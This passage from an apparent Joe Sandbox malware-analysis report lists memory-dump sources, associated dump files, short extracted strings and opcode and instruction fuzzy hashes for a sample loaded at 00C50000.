                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ,vx
                                                                                    • API String ID: 0-3288604689
                                                                                    • Opcode ID: 49faa52e7b29f58d2f38cde5816935a24d9126fb1a4703acfae51910565a54f0
                                                                                    • Instruction ID: c809a368eb493ba411142f56a098fb19494b2766604441d34b05a8755a1e1f71
                                                                                    • Opcode Fuzzy Hash: 49faa52e7b29f58d2f38cde5816935a24d9126fb1a4703acfae51910565a54f0
                                                                                    • Instruction Fuzzy Hash: 80C180B3F5122547F3544879CD58392A6839BE5324F2F82388E9CAB7C6DC7E9C0A5384
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0G0m
                                                                                    • API String ID: 0-1224710126
                                                                                    • Opcode ID: 195821477a5c1c1b427621914c2909fd41fafe22ec76c0f38853da66c32d3a0c
                                                                                    • Instruction ID: 01f961baf5df9dee873550248554975c06ea25561fca5608ef2232b2fa8e73a3
                                                                                    • Opcode Fuzzy Hash: 195821477a5c1c1b427621914c2909fd41fafe22ec76c0f38853da66c32d3a0c
                                                                                    • Instruction Fuzzy Hash: 67B1AFF3F5022647F3444D78CC983A26683EB95324F2F82788E58AB7C5D87E9D0A5384
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0
                                                                                    • API String ID: 0-4108050209
                                                                                    • Opcode ID: ab8f55094fd46eb4da84532cace1a11ba13008673543fb60bb79634eedbcf797
                                                                                    • Instruction ID: b10ed901a3ea58c8ab64ed665106779ccf62f3350d8bd6678e5ba99c01535e09
                                                                                    • Opcode Fuzzy Hash: ab8f55094fd46eb4da84532cace1a11ba13008673543fb60bb79634eedbcf797
                                                                                    • Instruction Fuzzy Hash: 99915A33658A900BC31C6D7D4C6537A7A834BD3234F3E836EB9B2CB3E2D51988095354
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $
                                                                                    • API String ID: 0-3993045852
                                                                                    • Opcode ID: 4c96c1eedc324b919c064d5021233bde0dce1e6a398e2ec5c01f49bd5462baa2
                                                                                    • Instruction ID: c05cec1a31bb7023a1b0d8735b9b11ba8de3e7be11c48e1ac15007d23dccad6b
                                                                                    • Opcode Fuzzy Hash: 4c96c1eedc324b919c064d5021233bde0dce1e6a398e2ec5c01f49bd5462baa2
                                                                                    • Instruction Fuzzy Hash: 43A16CB3F6152547F3484928CC693A16643EB94324F2F827C8E4EAB7C6ED7E9D095384
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: K
                                                                                    • API String ID: 0-856455061
                                                                                    • Opcode ID: a6d579edc1f56ea3f42a8ceab145027f0dc8b3d0cc885ae90da16c6df4eebce4
                                                                                    • Instruction ID: 02040d5265e8be121f7b103205481eb9fb4b08e0dec4ff03f54ad238d52cff16
                                                                                    • Opcode Fuzzy Hash: a6d579edc1f56ea3f42a8ceab145027f0dc8b3d0cc885ae90da16c6df4eebce4
                                                                                    • Instruction Fuzzy Hash: 3E914AF3F502254BF3584879CD983A2668397A4314F2F827C8F896B7CADC7E5D4A5284
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: X1(%
                                                                                    • API String ID: 0-470617371
                                                                                    • Opcode ID: a7e057b87e4a0c4039b46421ce04699f762f95d9bcdb9485ca89d839ba02296f
                                                                                    • Instruction ID: 99f02de474cbc861df67b7134eb3bbfa82aed33eba78529a8211ad85c8229ea1
                                                                                    • Opcode Fuzzy Hash: a7e057b87e4a0c4039b46421ce04699f762f95d9bcdb9485ca89d839ba02296f
                                                                                    • Instruction Fuzzy Hash: C99168B3F116254BF3544D29CCA83626643ABE5324F2F82788E4D6B7C6ED7E5C0A5384
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: cba`
                                                                                    • API String ID: 2994545307-1926275841
                                                                                    • Opcode ID: bd15b792769c2df8a4f244d310ed19322a7c88246b6f00bcad7b850b163446b4
                                                                                    • Instruction ID: 55927ca734791075839244f80d2752f385b766b1590ec8a526e7a258cf7cd1f7
                                                                                    • Opcode Fuzzy Hash: bd15b792769c2df8a4f244d310ed19322a7c88246b6f00bcad7b850b163446b4
                                                                                    • Instruction Fuzzy Hash: 8E713A71A087009FE728EE2CD89573EB7A2EB94318F18452EE5A7876A1D7319D00CB47
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `
                                                                                    • API String ID: 0-2679148245
                                                                                    • Opcode ID: 5ca388343c6f0dbdfed2df1b1998f5dd6416a0685141b633e85382e87531b71e
                                                                                    • Instruction ID: c215a3a68c8718697e472faa352316d9f30e1757e1c586b62ee00cfca995bc7a
                                                                                    • Opcode Fuzzy Hash: 5ca388343c6f0dbdfed2df1b1998f5dd6416a0685141b633e85382e87531b71e
                                                                                    • Instruction Fuzzy Hash: 22816BF3F1162547F3980834CC983666683EBA1325F2F82388B49AB7C5DC7E9D0A5384
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: "
                                                                                    • API String ID: 0-123907689
                                                                                    • Opcode ID: 1bde58d3ad00dbcf7b211c85afe0c87ae7ec8536041c5ee7d742fbdcfbaf8b1e
                                                                                    • Instruction ID: b7645b40df598d592da656d6844518463fdef838635afc0ab2baa31dacc5cea9
                                                                                    • Opcode Fuzzy Hash: 1bde58d3ad00dbcf7b211c85afe0c87ae7ec8536041c5ee7d742fbdcfbaf8b1e
                                                                                    • Instruction Fuzzy Hash: 2871E6327097558BE7249D6D8C8021EB6C36BC6330F69C768E8BD9B3E5E675CD018782
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: w
                                                                                    • API String ID: 0-476252946
                                                                                    • Opcode ID: 929f73faf9f030f9d113ce8b3f6c82913983efa4c933609435a37c00e626cbed
                                                                                    • Instruction ID: cf5e54a51ebe2a23730958a0c12fbc6c219c11a397b327a4cc44b2c2e1aefcdf
                                                                                    • Opcode Fuzzy Hash: 929f73faf9f030f9d113ce8b3f6c82913983efa4c933609435a37c00e626cbed
                                                                                    • Instruction Fuzzy Hash: A78179B3F111258BF3944D38CC583A26253A7A4320F2F82388E9D6BBC5ED7E5D0A5384
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: t*}
                                                                                    • API String ID: 0-2512514278
                                                                                    • Opcode ID: 499924786cc482de4c675cf53698c595b6e95bdf92de43271a8bf9e81af18b41
                                                                                    • Instruction ID: e5910a14fac1513769148582e0040aec52b34be21bc88a8e653867d5497f8eb4
                                                                                    • Opcode Fuzzy Hash: 499924786cc482de4c675cf53698c595b6e95bdf92de43271a8bf9e81af18b41
                                                                                    • Instruction Fuzzy Hash: 4C6104B3E086245FE300AA2DDC4536AB7D5DB94320F2B4A3DDED8D7380E9399C018696
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: <
                                                                                    • API String ID: 0-4251816714
                                                                                    • Opcode ID: b5387f8e8cf77944b9d9154e38df334473d6355a4c14fe1242a323d999c77ffb
                                                                                    • Instruction ID: c7127fd1b37556692dfa6f54d42e65fd74e853d188e5e15d814c289c40e57668
                                                                                    • Opcode Fuzzy Hash: b5387f8e8cf77944b9d9154e38df334473d6355a4c14fe1242a323d999c77ffb
                                                                                    • Instruction Fuzzy Hash: 53717B73E112258BF3944E38CC983A17392EB95315F2E817C8E895B7C6DD3E6D499384
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: cba`
                                                                                    • API String ID: 2994545307-1926275841
                                                                                    • Opcode ID: 3a64d919be70691a297760c43f24c84234ed971f1d296c60c37ef864bb9f11cb
                                                                                    • Instruction ID: 34a6601c1a7014d6d65416c10f39eca9510789045fd8ac5b5d8b3af04a4a8573
                                                                                    • Opcode Fuzzy Hash: 3a64d919be70691a297760c43f24c84234ed971f1d296c60c37ef864bb9f11cb
                                                                                    • Instruction Fuzzy Hash: 3A5128382082809BD7588B28DC95B7F7796EB91315F24983CE89E97263C6309E89C745
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
